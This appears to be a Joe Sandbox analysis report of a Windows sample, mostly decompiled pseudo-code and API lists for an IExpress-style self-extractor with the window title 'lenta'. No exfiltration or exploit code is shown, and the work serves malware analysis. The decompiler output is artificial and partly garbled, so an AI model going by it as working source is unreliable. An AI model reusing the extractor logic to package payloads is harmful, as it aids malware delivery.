                                                                                                                                                                                                                                                0x00103369
                                                                                                                                                                                                                                                0x0010336a
                                                                                                                                                                                                                                                0x0010336b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010336b
                                                                                                                                                                                                                                                0x0010331c
                                                                                                                                                                                                                                                0x00103323
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103329
                                                                                                                                                                                                                                                0x0010332b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010332b
                                                                                                                                                                                                                                                0x0010324c
                                                                                                                                                                                                                                                0x0010324c
                                                                                                                                                                                                                                                0x0010324f
                                                                                                                                                                                                                                                0x001032c8

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000003E8,00108598,00000200), ref: 00103271
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 001033E2
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 001033F7
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00103410
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000836), ref: 00103426
                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000), ref: 0010342D
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 0010343F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$lenta
                                                                                                                                                                                                                                                • API String ID: 2418873061-4094094698
                                                                                                                                                                                                                                                • Opcode ID: e81a829e88218eba867f19c2629d24892003be430ad68bb93755f52a47fea740
                                                                                                                                                                                                                                                • Instruction ID: 141cd7fbce96ac4543616b118d444741b7a34a8d1aa1e75a5dd3a8a48a7aeb43
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e81a829e88218eba867f19c2629d24892003be430ad68bb93755f52a47fea740
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A513670380340BBEB256B355C9CF7B2A5DAF96B54F508028F2E5EA5D1CFF48A4192A1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E00102CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				struct HRSRC__* _t31;
                                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                                				signed int _t67;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t13 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                                				_t65 = 0;
                                                                                                                                                                                                                                                				_t66 = __ecx;
                                                                                                                                                                                                                                                				_t48 = __edx;
                                                                                                                                                                                                                                                				 *0x109a3c = __ecx;
                                                                                                                                                                                                                                                				memset(0x109140, 0, 0x8fc);
                                                                                                                                                                                                                                                				memset(0x108a20, 0, 0x32c);
                                                                                                                                                                                                                                                				memset(0x1088c0, 0, 0x104);
                                                                                                                                                                                                                                                				 *0x1093ec = 1;
                                                                                                                                                                                                                                                				_t20 = E0010468F("TITLE", 0x109154, 0x7f);
                                                                                                                                                                                                                                                				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                                					_t64 = 0x4b1;
                                                                                                                                                                                                                                                					goto L32;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                                					 *0x10858c = _t27;
                                                                                                                                                                                                                                                					SetEvent(_t27);
                                                                                                                                                                                                                                                					_t64 = 0x109a34;
                                                                                                                                                                                                                                                					if(E0010468F("EXTRACTOPT", 0x109a34, 4) != 0) {
                                                                                                                                                                                                                                                						if(( *0x109a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                                							L12:
                                                                                                                                                                                                                                                							 *0x109120 =  *0x109120 & _t65;
                                                                                                                                                                                                                                                							if(E00105C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                                								if( *0x108a3a == 0) {
                                                                                                                                                                                                                                                									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                                									if(_t31 != 0) {
                                                                                                                                                                                                                                                										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									if( *0x108184 != 0) {
                                                                                                                                                                                                                                                										__imp__#17();
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									if( *0x108a24 == 0) {
                                                                                                                                                                                                                                                										_t57 = _t65;
                                                                                                                                                                                                                                                										if(E001036EE(_t65) == 0) {
                                                                                                                                                                                                                                                											goto L33;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											_t33 =  *0x109a40; // 0x3
                                                                                                                                                                                                                                                											_t48 = 1;
                                                                                                                                                                                                                                                											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                                												if(( *0x109a34 & 0x00000100) == 0 || ( *0x108a38 & 0x00000001) != 0 || E001018A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                                													goto L30;
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													_t64 = 0x7d6;
                                                                                                                                                                                                                                                													if(E00106517(_t57, 0x7d6, _t34, E001019E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                                														goto L33;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														goto L30;
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												L30:
                                                                                                                                                                                                                                                												_t23 = _t48;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t23 = 1;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E00102390(0x108a3a);
                                                                                                                                                                                                                                                									goto L33;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t64 = 0x520;
                                                                                                                                                                                                                                                								L32:
                                                                                                                                                                                                                                                								E001044B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                								goto L33;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t64 =  &_v268;
                                                                                                                                                                                                                                                							if(E0010468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                                								goto L3;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                                								 *0x108588 = _t43;
                                                                                                                                                                                                                                                								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                                									goto L12;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									if(( *0x109a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                                										_t64 = 0x524;
                                                                                                                                                                                                                                                										if(E001044B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                                											goto L12;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L11;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t64 = 0x54b;
                                                                                                                                                                                                                                                										E001044B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                                										L11:
                                                                                                                                                                                                                                                										CloseHandle( *0x108588);
                                                                                                                                                                                                                                                										 *0x109124 = 0x800700b7;
                                                                                                                                                                                                                                                										goto L33;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						L3:
                                                                                                                                                                                                                                                						_t64 = 0x4b1;
                                                                                                                                                                                                                                                						E001044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						 *0x109124 = 0x80070714;
                                                                                                                                                                                                                                                						L33:
                                                                                                                                                                                                                                                						_t23 = 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00106CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102dca
                                                                                                                                                                                                                                                0x00102dd3
                                                                                                                                                                                                                                                0x00102df5
                                                                                                                                                                                                                                                0x00102e02
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102dd5
                                                                                                                                                                                                                                                0x00102dde
                                                                                                                                                                                                                                                0x00102de3
                                                                                                                                                                                                                                                0x00102e04
                                                                                                                                                                                                                                                0x00102e0a
                                                                                                                                                                                                                                                0x00102e10
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102e10
                                                                                                                                                                                                                                                0x00102dd3
                                                                                                                                                                                                                                                0x00102dbb
                                                                                                                                                                                                                                                0x00102da1
                                                                                                                                                                                                                                                0x00102d5b
                                                                                                                                                                                                                                                0x00102d5b
                                                                                                                                                                                                                                                0x00102d5d
                                                                                                                                                                                                                                                0x00102d69
                                                                                                                                                                                                                                                0x00102d6e
                                                                                                                                                                                                                                                0x00102f06
                                                                                                                                                                                                                                                0x00102f06
                                                                                                                                                                                                                                                0x00102f06
                                                                                                                                                                                                                                                0x00102d59
                                                                                                                                                                                                                                                0x00102f18

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00102CD9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00102CE9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00102CF9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00102D34
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00102D40
                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00102DAE
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00102DBD
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00102E0A
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                                • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                                • Opcode ID: 835c42a2572cdb3362b05837bb36588a88de337350b7fede026e0ee7ca260f25
                                                                                                                                                                                                                                                • Instruction ID: b88fa52d1a0394babf36af1b3405c47e028058f462f6f95c92624166e3cbfb69
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 835c42a2572cdb3362b05837bb36588a88de337350b7fede026e0ee7ca260f25
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF5107B0384301ABE724A734CD5EB7B3699EB55750F548029FAC1D69E5DBF88C81C621
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                                                                			E001034F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                                				struct HWND__* _t35;
                                                                                                                                                                                                                                                				struct HWND__* _t38;
                                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                                				if(_t9 == 0) {
                                                                                                                                                                                                                                                					__eflags = 1;
                                                                                                                                                                                                                                                					L19:
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					 *0x1091d8 = 1;
                                                                                                                                                                                                                                                					L20:
                                                                                                                                                                                                                                                					_push(_a4);
                                                                                                                                                                                                                                                					L21:
                                                                                                                                                                                                                                                					EndDialog();
                                                                                                                                                                                                                                                					L22:
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                                                                				_pop(1);
                                                                                                                                                                                                                                                				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                                				if(_t12 == 0) {
                                                                                                                                                                                                                                                					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                                					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L19;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                                				if(_t13 == 0) {
                                                                                                                                                                                                                                                					_t35 = _a4;
                                                                                                                                                                                                                                                					 *0x108584 = _t35;
                                                                                                                                                                                                                                                					E001043D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                                					__eflags =  *0x108184; // 0x1
                                                                                                                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                                                                                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                                					_t17 = CreateThread(0, 0, E00104FE0, 0, 0, 0x108798);
                                                                                                                                                                                                                                                					 *0x10879c = _t17;
                                                                                                                                                                                                                                                					__eflags = _t17;
                                                                                                                                                                                                                                                					if(_t17 != 0) {
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						E001044B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						_push(_t35);
                                                                                                                                                                                                                                                						goto L21;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t23 = _t13 - 1;
                                                                                                                                                                                                                                                				if(_t23 == 0) {
                                                                                                                                                                                                                                                					__eflags = _a12 - 2;
                                                                                                                                                                                                                                                					if(_a12 != 2) {
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					ResetEvent( *0x10858c);
                                                                                                                                                                                                                                                					_t38 =  *0x108584; // 0x0
                                                                                                                                                                                                                                                					_t25 = E001044B9(_t38, 0x4b2, 0x101140, 0, 0x20, 4);
                                                                                                                                                                                                                                                					__eflags = _t25 - 6;
                                                                                                                                                                                                                                                					if(_t25 == 6) {
                                                                                                                                                                                                                                                						L11:
                                                                                                                                                                                                                                                						 *0x1091d8 = 1;
                                                                                                                                                                                                                                                						SetEvent( *0x10858c);
                                                                                                                                                                                                                                                						_t39 =  *0x10879c; // 0x0
                                                                                                                                                                                                                                                						E00103680(_t39);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						goto L20;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__eflags = _t25 - 1;
                                                                                                                                                                                                                                                					if(_t25 == 1) {
                                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					SetEvent( *0x10858c);
                                                                                                                                                                                                                                                					goto L22;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                                					TerminateThread( *0x10879c, 0);
                                                                                                                                                                                                                                                					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000), ref: 00103535
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00103541
                                                                                                                                                                                                                                                • ResetEvent.KERNEL32 ref: 0010355F
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00101140,00000000,00000020,00000004), ref: 00103590
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 001035C7
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 001035F1
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 001035F8
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 00103610
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 00103617
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 00103623
                                                                                                                                                                                                                                                • CreateThread.KERNEL32 ref: 00103637
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 00103671
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 928aaa9d7892ccc6a7454cdb72206d18f2ae1965a22db6307e538e539563002a
                                                                                                                                                                                                                                                • Instruction ID: 666bb057abcf8662cc60966b0ec3d427243d22f564a3874342a29b17b316aabd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 928aaa9d7892ccc6a7454cdb72206d18f2ae1965a22db6307e538e539563002a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C531EF70244301BBD7211F25EC4DE2A3A6DFB89B00F904529F7E295AF1CBF28A80CB55
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                                			E00104224(char __ecx) {
                                                                                                                                                                                                                                                				char* _v8;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                                				char* _v28;
                                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                                				char _v44;
                                                                                                                                                                                                                                                				char _v48;
                                                                                                                                                                                                                                                				char _v52;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                                				char _t42;
                                                                                                                                                                                                                                                				char* _t44;
                                                                                                                                                                                                                                                				char* _t61;
                                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                                				char* _t65;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                                				char _t67;
                                                                                                                                                                                                                                                				void* _t71;
                                                                                                                                                                                                                                                				char _t76;
                                                                                                                                                                                                                                                				intOrPtr _t85;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t67 = __ecx;
                                                                                                                                                                                                                                                				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                                				if(_t66 == 0) {
                                                                                                                                                                                                                                                					_t63 = 0x4c2;
                                                                                                                                                                                                                                                					L22:
                                                                                                                                                                                                                                                					E001044B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                                				_v12 = _t26;
                                                                                                                                                                                                                                                				if(_t26 == 0) {
                                                                                                                                                                                                                                                					L20:
                                                                                                                                                                                                                                                					FreeLibrary(_t66);
                                                                                                                                                                                                                                                					_t63 = 0x4c1;
                                                                                                                                                                                                                                                					goto L22;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                                				_v20 = _t28;
                                                                                                                                                                                                                                                				if(_t28 == 0) {
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                                				_v16 = _t29;
                                                                                                                                                                                                                                                				if(_t29 == 0) {
                                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t76 =  *0x1088c0; // 0x0
                                                                                                                                                                                                                                                				if(_t76 != 0) {
                                                                                                                                                                                                                                                					L10:
                                                                                                                                                                                                                                                					 *0x1087a0 = 0;
                                                                                                                                                                                                                                                					_v52 = _t67;
                                                                                                                                                                                                                                                					_v48 = 0;
                                                                                                                                                                                                                                                					_v44 = 0;
                                                                                                                                                                                                                                                					_v40 = 0x108598;
                                                                                                                                                                                                                                                					_v36 = 1;
                                                                                                                                                                                                                                                					_v32 = E00104200;
                                                                                                                                                                                                                                                					_v28 = 0x1088c0;
                                                                                                                                                                                                                                                					 *0x10a288( &_v52);
                                                                                                                                                                                                                                                					_t32 =  *_v12();
                                                                                                                                                                                                                                                					if(_t71 != _t71) {
                                                                                                                                                                                                                                                						asm("int 0x29");
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_v12 = _t32;
                                                                                                                                                                                                                                                					if(_t32 != 0) {
                                                                                                                                                                                                                                                						 *0x10a288(_t32, 0x1088c0);
                                                                                                                                                                                                                                                						 *_v16();
                                                                                                                                                                                                                                                						if(_t71 != _t71) {
                                                                                                                                                                                                                                                							asm("int 0x29");
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						if( *0x1088c0 != 0) {
                                                                                                                                                                                                                                                							E00101680(0x1087a0, 0x104, 0x1088c0);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *0x10a288(_v12);
                                                                                                                                                                                                                                                						 *_v20();
                                                                                                                                                                                                                                                						if(_t71 != _t71) {
                                                                                                                                                                                                                                                							asm("int 0x29");
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					FreeLibrary(_t66);
                                                                                                                                                                                                                                                					_t85 =  *0x1087a0; // 0x0
                                                                                                                                                                                                                                                					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					GetTempPathA(0x104, 0x1088c0);
                                                                                                                                                                                                                                                					_t61 = 0x1088c0;
                                                                                                                                                                                                                                                					_t4 =  &(_t61[1]); // 0x1088c1
                                                                                                                                                                                                                                                					_t65 = _t4;
                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                						_t42 =  *_t61;
                                                                                                                                                                                                                                                						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                                					} while (_t42 != 0);
                                                                                                                                                                                                                                                					_t5 = _t61 - _t65 + 0x1088c0; // 0x211181
                                                                                                                                                                                                                                                					_t44 = CharPrevA(0x1088c0, _t5);
                                                                                                                                                                                                                                                					_v8 = _t44;
                                                                                                                                                                                                                                                					if( *_t44 == 0x5c &&  *(CharPrevA(0x1088c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                                						 *_v8 = 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}





























                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00104236
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0010424C
